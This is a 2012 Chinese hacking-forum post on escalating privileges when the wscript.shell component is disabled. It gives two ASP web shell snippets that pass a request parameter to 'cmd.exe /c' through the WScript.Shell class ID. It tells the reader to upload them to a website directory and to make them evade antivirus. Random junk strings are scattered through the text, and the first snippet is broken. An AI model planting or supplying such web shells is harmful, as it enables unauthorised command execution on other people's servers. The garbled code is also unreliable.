中国网络渗透测试联盟

标题: 没有wscript.shell组件提权方法 [打印本页]

作者: admin 时间: 2012-10-21 09:08
标题: 没有wscript.shell组件提权方法

可能有很多人，看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
# D+ T8 f& O9 q4 G9 ^- l; T
一般当闭上面组件时，你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。% D# Y9 r3 c3 Z9 l `
要想让运行命令可以试试这种方法，成功率为五五之数。
9 f& K: W: L t' {
把下面代码复制：
# H) u- d2 {" l+ \( d- o
<%
; q9 x) ~3 I4 T" I
end if
; M4 D/ M& s, Q5 H# t/ o
response.write(”")8 K- z( v- i4 s( Z
On Error Resume
. n6 I1 Y7 ?" U) F
Next# d/ B0 X9 d9 U9 O" y
response.write oScriptlhn.exec(”cmd.exe /c” &
8 z5 ?( y8 t6 o3 i! A0 K2 R
request(”c”)).stdout.readall3 X% I; [+ L" I9 m4 b$ N
response.write(”")
- Z% V8 O H8 x L$ Z4 k# j
response.write(”")
* H; R; K0 b4 r
response.write(”" ]' I0 p1 y: C u: {9 u
“)3 a, W( |$ B; d% y
response.write(”"): g# h" t' Q2 o
%>. o9 p2 A$ B5 C# d- @" K( r& Q
保存为一个asp文件，然后传到网站目录上去2 \& B% l; }9 }) _4 {
运行的时候可能会出现两个问题，第一是运行了为什么运行不了命令，这个你可以试着再上传个cmd.exe然后把路径写入上面代码。, Q, `9 T2 m0 Q9 G2 ]+ o
我用此成功运行过cacls命令。* n- ^" }8 J: o, ?8 c
第二那就是运行时出错，可能限制某些代码执行; d6 S# p0 Q: c& ~# K$ J/ `$ S
无wscript.shell组件提权又一个方法
7 b* e& M$ c% d( E
<object runat=server id=oScriptlhn scope=page 1 X& w, g( h5 Y c3 C
& t+ Z, q( [" a5 N. o( l
classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>0 s# \ O+ A# C8 r
<%if err then%>
. h3 j6 _: L9 h) Y8 u, X# K
<object runat=server id=oScriptlhn scope=page $ d: `9 d9 I) H# W# B
# h, y0 R0 @7 v. j6 c$ f
classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>
0 s# s* E5 P( f5 |( e( n6 w
<%
. J V1 i9 n- I4 |6 b
end if
4 ~; u0 h; ]" K$ W0 _
response.write(”<textarea readonly cols=80
! _8 g5 k' T/ Y8 M
* a0 A& A, w# k
rows=20>”)
) I- K+ h- C. X% {3 A
On Error Resume Next . |, A5 M9 c" ?& y ?; T- F
response.write % }" x6 M$ P6 C' Z
; q, v) K8 R; l4 w0 ?4 D9 g6 @
oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall5 x$ b! N6 \( A/ Y! L$ Y
response.write(”</textarea>”) ( x4 t" q7 {( j% T
response.write(”<form
4 ^+ e3 ]6 [& C6 r, e( l% Q) c2 I8 o
$ X2 W: j/ u; `
method=’post’>”)
# @9 y9 ?! g- b6 o
response.write(”<input type=text name=’c'
$ J1 _- W. G4 O& X+ s
. _( D5 T7 K# ?% r$ ?( A& X
size=60><br>”) / R x c% X- \9 B
response.write(”<input type=submit
/ p9 V7 Y3 Y m) r# }0 z8 [& c6 x
; A" P# N9 b; n% h
value=’执行’></form>”)
4 h, X/ F, @' {0 [
%>8 p1 G2 l" e e- a
保存为ASP，此代码可能被杀，请注意免杀。
9 m! r6 p! t- t9 C0 l% V
原理：有些人把wscript.shell改名了,但是clsid没有变，所以调用这个clsid就等于调用ws组建
0 L. L& v% R$ P _, K' C7 k

复制代码

欢迎光临中国网络渗透测试联盟 (https://www.cobjon.com/)